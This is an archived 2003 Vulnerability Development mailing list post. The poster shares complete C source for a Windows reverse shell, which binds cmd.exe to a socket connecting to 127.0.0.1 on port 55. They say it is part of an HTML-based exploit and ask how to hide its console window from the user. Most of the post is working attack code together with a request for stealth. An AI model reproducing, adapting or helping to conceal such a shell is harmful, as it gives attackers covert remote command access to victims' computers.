Vulnerability Development mailing list archives

freeconsole()

From: "Mike Mires" <poc_sploit () hotmail com>
Date: Wed, 26 Feb 2003 10:25:36 +0000

Hi all,

I am using a basic reverse shell written in C as part of an html basedexploit recently revealed by malware.com. it uses WSAStartup() andCreateProcess(). I'm looking for a way to hide the console created byCreateProcess. Ive tried freeconsole() with no params as suggested by somesources, however this does not work.


Any ideas would be appreciated.

Thanks

P.S. code i'm using is


#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")



void main(int argc, char *argv[])
{
//      FreeConsole();


       WSADATA wsaData;
       SOCKET hSocket;
       STARTUPINFO si;
       PROCESS_INFORMATION pi;

       struct sockaddr_in adik_sin;
       memset(&adik_sin,0,sizeof(adik_sin));
       memset(&si,0,sizeof(si));
       WSAStartup(MAKEWORD(2,0),&wsaData);
       hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
       adik_sin.sin_family = AF_INET;
       adik_sin.sin_port = htons(55);
       adik_sin.sin_addr.s_addr = inet_addr("127.0.0.1");
       connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin));
       si.cb = sizeof(si);
       si.dwFlags = STARTF_USESTDHANDLES;
       si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;

       CreateProcess(NULL,"cmd",NULL,NULL,1,NULL,NULL,NULL,&si,&pi);



                ExitProcess(0);

}


_________________________________________________________________

Overloaded with spam? With MSN 8, you can filter it outhttp://join.msn.com/?page=features/junkmail&pgmarket=en-gb&XAPID=32&DI=1059

Current thread:

freeconsole() Mike Mires (Feb 26)
- Re: freeconsole() Oscar Gallego Sendín (Feb 27)
- Non registering shell Rory Savage (Feb 27)
  - Re: Non registering shell Brian Hatch (Feb 27)
    - Re: Non registering shell Rory Savage (Feb 28)
    - Re: Non registering shell Brian Hatch (Feb 28)
- Re: freeconsole() sk (Feb 28)